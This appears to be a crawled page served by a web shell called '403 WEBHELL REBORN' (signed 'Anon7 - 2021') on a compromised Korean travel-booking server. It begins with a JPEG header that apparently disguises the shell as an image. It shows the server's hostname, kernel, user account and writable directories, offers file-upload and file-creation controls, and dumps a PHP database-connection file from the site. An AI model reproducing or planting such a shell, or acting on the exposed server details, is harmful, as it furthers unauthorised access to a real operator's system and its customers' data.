ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/Lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/Lib/zipconnect.php
<?
/**
 * 우편번호 DB 컨넥션 파일
 *
 * 작성자  
 * 작성일 : 2009.09.23
 */

// 우편번호 DB 접속정보
// /Lib/config.php 에서 설정


// DB 접속
$zipconnect = db_connect($cf['zip_db_host'], $cf['zip_db_id'], $cf['zip_db_pw'], $cf['zip_db_name']);
//$db_select = mysql_select_db($zdb_name_new, $zipconnect_road);
if (!$zipconnect) die("도로명주소 DB 접속 오류가 발생하였습니다. 투어오피스 고객센터(Tel.051-246-1505)로 연락주세요.");

// DB 인코딩 설정
db_query("set names '{$cf[charset_str]}'",TRUE,$zipconnect);

// 페이지 헤더 인코딩 설정
@header("content-type: text/html; charset={$cf[charset]}");
?>

Anon7 - 2021